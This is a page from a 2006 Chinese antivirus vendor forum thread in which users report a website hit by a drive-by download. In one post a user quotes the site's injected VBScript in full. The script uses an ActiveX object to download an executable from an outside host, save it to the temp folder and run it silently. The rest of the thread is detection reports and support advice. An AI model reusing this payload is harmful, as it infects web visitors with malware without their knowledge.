微点交流论坛
» 游客:  注册 | 登录 | 帮助

 微点交流论坛 » 微点主动防御软件 » 这个网站被挂马,其它软件有报,微点没有反应。  

 18  2/2  <  1  2 
作者:
标题: 这个网站被挂马,其它软件有报,微点没有反应。
反黑先锋
版主

RUNWAY


积分 2901
发帖 2857
注册 2006-6-17
#11  



  Quote:
Originally posted by 囚中城 at 2006-8-21 23:17:
成人网……
NOD32跟ewido+微点都没报呀。可能要停留一段时间,等木马下载完吧。不过我这人多,不能老开这窗口

小红伞报了两下~

※ ※ ※ 本文纯属【反黑先锋】个人意见,与【 微点交流论坛 】立场无关※ ※ ※

荣先祥藏头诗《赞东方微点》
东风欣传好消息
方策独步世所稀
微妙玄机嵌主动
点睛灭毒堪神笔
2006-8-22 06:39
查看资料  发短消息   编辑帖子
flo
注册用户





积分 168
发帖 168
注册 2006-8-17
#12  

AVP6也报了,吓了我一跳...
这个网站绝对有问题啊。
document.writeln("<script language=\"VBScript\">");
document.writeln("    on error resume next");
document.writeln("dl = \"http:\/\/www.23597.com\/pc\/ms.exe\"");
document.writeln("    Set df = document.createElement(\"object\")");
document.writeln("    df.setAttribute \"classid\", \"clsid:BD96C556-65A3-11D0-983A-00C04FC29E36\"");
document.writeln("    str=\"Microsoft.XMLHTTP\"");
document.writeln("    Set x = df.CreateObject(str,\"\")");
document.writeln("    a1=\"Ado\"");
document.writeln("    a2=\"db.\"");
document.writeln("    a3=\"Str\"");
document.writeln("    a4=\"eam\"");
document.writeln("    str1=a1&a2&a3&a4");
document.writeln("    str5=str1");
document.writeln("    set S = df.createobject(str5,\"\")");
document.writeln("    S.type = 1");
document.writeln("    str6=\"GET\"");
document.writeln("    x.Open str6, dl, False");
document.writeln("    x.Send");
document.writeln("    fname1=\"g0ld.com\"");
document.writeln("    set F = df.createobject(\"Scripting.FileSystemObject\",\"\")");
document.writeln("    set tmp = F.GetSpecialFolder(2) ");
document.writeln("    fname1= F.BuildPath(tmp,fname1)");
document.writeln("    S.open");
document.writeln("    S.write x.responseBody");
document.writeln("    S.savetofile fname1,2");
document.writeln("    S.close");
document.writeln("    set Q = df.createobject(\"Shell.Application\",\"\")");
document.writeln("    Q.ShellExecute fname1,\"\",\"\",\"open\",0");
document.writeln("    <\/script>")
标准的下载后运行代码。

[ Last edited by flo on 2006-8-22 at 16:25 ]

※ ※ ※ 本文纯属【flo】个人意见,与【 微点交流论坛 】立场无关※ ※ ※
2006-8-22 16:22
查看资料  发短消息   编辑帖子
claymore
新手上路





积分 11
发帖 11
注册 2006-8-7
#13  

这个是利用系统漏洞下载的

反正我点了没有生成任何文件 - - 也没有防火墙报...

※ ※ ※ 本文纯属【claymore】个人意见,与【 微点交流论坛 】立场无关※ ※ ※
2006-8-23 18:32
查看资料  发短消息   编辑帖子
285166790
新手上路





积分 14
发帖 14
注册 2006-8-26
#14  

我上了一下这个网站,微点报是报了也杀了,可是网站还是不停的弹出窗口,搞的我都死机了,这到底算怎么回事

※ ※ ※ 本文纯属【285166790】个人意见,与【 微点交流论坛 】立场无关※ ※ ※
2006-8-27 10:54
查看资料  发送邮件  发短消息   编辑帖子
pjc1980
注册用户





积分 98
发帖 98
注册 2006-8-20
#15  

微点没报,但是IE把该网站一些信息自动拦截了

※ ※ ※ 本文纯属【pjc1980】个人意见,与【 微点交流论坛 】立场无关※ ※ ※
2006-8-27 11:24
查看资料  发送邮件  发短消息   编辑帖子
yuying369
新手上路





积分 1
发帖 1
注册 2006-8-27
#16  有点过分了!

报是报了,一查结果:
我用磁盘整理软件服务也被截了!
怎样设置微点还没找着!

※ ※ ※ 本文纯属【yuying369】个人意见,与【 微点交流论坛 】立场无关※ ※ ※
2006-8-27 11:34
查看资料  发送邮件  发短消息   编辑帖子
Legend
超级版主

超级版主



积分 77171
发帖 70170
注册 2005-10-29
#17  

yuying369,请你把你的程序生成日志,木马日志,进程启动退出日志,发到SUPPORT@MICROPOINT.COM.CN 并在邮件中注明访问了什么网站,出现什么情况,结果是什么 谢谢

※文章所有权归【Legend】与【东方微点论坛】共同所有,转载请注明出处!※

微点官方认证新浪微博:欢迎进入 微点新浪微博
微点技术支持邮箱: support@micropoint.com.cn
给Legend发短消息
2006-8-27 11:36
查看资料  发短消息   编辑帖子
keqiner
新手上路





积分 19
发帖 19
注册 2006-8-26
#18  

建议大家在安装完微点后先来个漏洞扫描...把漏洞都打好了..!!

※ ※ ※ 本文纯属【keqiner】个人意见,与【 微点交流论坛 】立场无关※ ※ ※
2006-8-27 20:33
查看资料  发短消息   编辑帖子
 18  2/2  <  1  2 



论坛跳转:

可打印版本 | 推荐 | 订阅 | 收藏


[ 联系我们 - 东方微点 ]

北京东方微点信息技术有限责任公司 福建东方微点信息安全有限责任公司

闽ICP备05030815号